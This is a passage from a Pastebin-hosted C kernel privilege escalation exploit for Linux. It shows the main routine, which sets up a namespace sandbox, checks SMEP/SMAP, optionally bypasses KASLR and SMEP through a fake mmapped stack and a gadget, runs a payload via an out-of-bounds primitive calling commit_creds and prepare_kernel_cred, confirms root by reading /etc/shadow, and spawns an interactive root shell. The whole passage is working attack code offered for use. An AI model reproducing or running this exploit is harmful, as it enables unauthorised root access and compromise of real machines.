  584.         perror("[-] system(/sbin/ifconfig lo up)");
  585.         exit(EXIT_FAILURE);
  586.     }
  587. }
  588.  
  589. void exec_shell() {
  590.     char* shell = "/bin/bash";
  591.     char* args[] = {shell, "-i", NULL};
  592.     execve(shell, args, NULL);
  593. }
  594.  
  595. bool is_root() {
  596.     // We can't simple check uid, since we're running inside a namespace
  597.     // with uid set to 0. Try opening /etc/shadow instead.
  598.     int fd = open("/etc/shadow", O_RDONLY);
  599.     if (fd == -1)
  600.         return false;
  601.     close(fd);
  602.     return true;
  603. }
  604.  
  605. void check_root() {
  606.     printf("[.] checking if we got root\n");
  607.     if (!is_root()) {
  608.         printf("[-] something went wrong =(\n");
  609.         return;
  610.     }
  611.     printf("[+] got r00t ^_^\n");
  612.     exec_shell();
  613. }
  614.  
  615. int main(int argc, char** argv) {
  616.     printf("[.] starting\n");
  617.  
  618.     printf("[.] checking distro and kernel versions\n");
  619.     printf("[~] done, versions looks good\n");
  620.  
  621.     printf("[.] checking SMEP and SMAP\n");
  622.     check_smep_smap();
  623.     printf("[~] done, looks good\n");
  624.  
  625.     printf("[.] setting up namespace sandbox\n");
  626.     setup_sandbox();
  627.     printf("[~] done, namespace sandbox set up\n");
  628.  
  629. #if ENABLE_KASLR_BYPASS
  630.     printf("[.] KASLR bypass enabled, getting kernel addr\n");
  631.     KERNEL_BASE = get_kernel_addr();
  632.     printf("[~] done, kernel text:   %lx\n", KERNEL_BASE);
  633. #endif
  634.  
  635.     printf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
  636.     printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
  637.  
  638.     unsigned long payload = (unsigned long)&get_root;
  639.  
  640. #if ENABLE_SMEP_BYPASS
  641.     printf("[.] SMEP bypass enabled, mmapping fake stack\n");
  642.     mmap_stack();
  643.     payload = XCHG_EAX_ESP_RET;
  644.     printf("[~] done, fake stack mmapped\n");
  645. #endif
  646.  
  647.     printf("[.] executing payload %lx\n", payload);
  648.     oob_execute(payload);
  649.     printf("[~] done, should be root now\n");
  650.  
  651.     check_root();
  652.  
  653.     return 0;
  654. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top